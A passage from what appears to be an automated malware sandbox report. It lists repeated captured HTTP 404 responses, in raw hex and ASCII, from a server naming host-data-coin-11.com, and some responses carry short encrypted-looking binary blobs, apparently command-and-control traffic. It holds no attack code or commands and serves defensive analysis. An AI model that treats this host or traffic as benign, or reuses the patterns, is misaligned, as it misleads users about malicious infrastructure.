2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 